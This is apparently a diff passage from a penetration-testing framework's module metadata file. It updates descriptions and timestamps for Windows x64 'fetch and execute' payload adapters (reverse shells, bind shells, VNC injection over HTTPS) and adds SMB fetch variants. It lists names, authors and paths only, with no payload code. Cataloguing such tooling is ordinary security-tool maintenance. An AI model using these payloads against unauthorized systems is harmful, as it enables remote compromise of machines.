"description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -205462,7 +205823,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/peinject/reverse_tcp_uuid",
|
||||
@@ -205493,7 +205854,7 @@
|
||||
"Brendan Watters",
|
||||
"bwatters-r7"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to attacker and report UUID (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and report UUID (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -205503,7 +205864,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/pingback_reverse_tcp",
|
||||
@@ -205534,7 +205895,7 @@
|
||||
"Dave Hardy",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.",
|
||||
"references": [
|
||||
"URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit"
|
||||
],
|
||||
@@ -205544,7 +205905,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/powershell_bind_tcp",
|
||||
@@ -205575,7 +205936,7 @@
|
||||
"Dave Hardy",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.",
|
||||
"references": [
|
||||
"URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit"
|
||||
],
|
||||
@@ -205585,7 +205946,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/powershell_reverse_tcp",
|
||||
@@ -205616,7 +205977,7 @@
|
||||
"Dave Hardy",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.",
|
||||
"references": [
|
||||
"URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit"
|
||||
],
|
||||
@@ -205626,7 +205987,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/powershell_reverse_tcp_ssl",
|
||||
@@ -205655,7 +206016,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -205665,7 +206026,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/shell/bind_ipv6_tcp",
|
||||
@@ -205697,7 +206058,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -205707,7 +206068,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/shell/bind_ipv6_tcp_uuid",
|
||||
@@ -205739,7 +206100,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"UserExistsError"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a pipe connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a pipe connection (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -205749,7 +206110,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/shell/bind_named_pipe",
|
||||
@@ -205780,7 +206141,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -205790,7 +206151,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/shell/bind_tcp",
|
||||
@@ -205826,7 +206187,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -205836,7 +206197,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/shell/bind_tcp_rc4",
|
||||
@@ -205868,7 +206229,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -205878,7 +206239,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/shell/bind_tcp_uuid",
|
||||
@@ -205909,7 +206270,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -205919,7 +206280,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/shell/reverse_tcp",
|
||||
@@ -205955,7 +206316,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -205965,7 +206326,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/shell/reverse_tcp_rc4",
|
||||
@@ -205997,7 +206358,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -206007,7 +206368,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/shell/reverse_tcp_uuid",
|
||||
@@ -206038,7 +206399,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nListen for a connection and spawn a command shell (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a connection and spawn a command shell (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -206048,7 +206409,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/shell_bind_tcp",
|
||||
@@ -206077,7 +206438,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to attacker and spawn a command shell (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and spawn a command shell (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -206087,7 +206448,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/shell_reverse_tcp",
|
||||
@@ -206116,7 +206477,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nListen for an IPv6 connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for an IPv6 connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -206127,7 +206488,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/vncinject/bind_ipv6_tcp",
|
||||
@@ -206159,7 +206520,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -206170,7 +206531,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/vncinject/bind_ipv6_tcp_uuid",
|
||||
@@ -206202,7 +206563,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"UserExistsError"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nListen for a pipe connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a pipe connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -206213,7 +206574,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/vncinject/bind_named_pipe",
|
||||
@@ -206244,7 +206605,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nListen for a connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -206255,7 +206616,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/vncinject/bind_tcp",
|
||||
@@ -206291,7 +206652,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -206302,7 +206663,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/vncinject/bind_tcp_rc4",
|
||||
@@ -206334,7 +206695,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nListen for a connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -206345,7 +206706,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/vncinject/bind_tcp_uuid",
|
||||
@@ -206377,7 +206738,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -206388,7 +206749,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/vncinject/reverse_http",
|
||||
@@ -206422,7 +206783,7 @@
|
||||
"agix",
|
||||
"rwincey"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -206433,7 +206794,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/vncinject/reverse_https",
|
||||
@@ -206464,7 +206825,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to the attacker (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -206475,7 +206836,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/vncinject/reverse_tcp",
|
||||
@@ -206511,7 +206872,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -206522,7 +206883,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/vncinject/reverse_tcp_rc4",
|
||||
@@ -206554,7 +206915,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -206565,7 +206926,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/vncinject/reverse_tcp_uuid",
|
||||
@@ -206597,7 +206958,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nTunnel communication over HTTP (Windows x64 winhttp)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nTunnel communication over HTTP (Windows x64 winhttp)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -206608,7 +206969,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/vncinject/reverse_winhttp",
|
||||
@@ -206640,7 +207001,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nTunnel communication over HTTPS (Windows x64 winhttp)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nTunnel communication over HTTPS (Windows x64 winhttp)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -206651,7 +207012,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/vncinject/reverse_winhttps",
|
||||
@@ -220337,6 +220698,3306 @@
|
||||
"payload_type": 1,
|
||||
"staged": false
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/custom/bind_ipv6_tcp": {
|
||||
"name": "SMB Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager",
|
||||
"fullname": "payload/cmd/windows/smb/x64/custom/bind_ipv6_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"bwatters-r7",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nListen for an IPv6 connection (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/custom/bind_ipv6_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/custom/bind_ipv6_tcp",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/custom",
|
||||
"stager_refname": "windows/x64/bind_ipv6_tcp"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/custom/bind_ipv6_tcp_uuid": {
|
||||
"name": "SMB Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager with UUID Support",
|
||||
"fullname": "payload/cmd/windows/smb/x64/custom/bind_ipv6_tcp_uuid",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"bwatters-r7",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/custom/bind_ipv6_tcp_uuid",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/custom/bind_ipv6_tcp_uuid",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/custom",
|
||||
"stager_refname": "windows/x64/bind_ipv6_tcp_uuid"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/custom/bind_named_pipe": {
|
||||
"name": "SMB Fetch, Windows shellcode stage, Windows x64 Bind Named Pipe Stager",
|
||||
"fullname": "payload/cmd/windows/smb/x64/custom/bind_named_pipe",
|
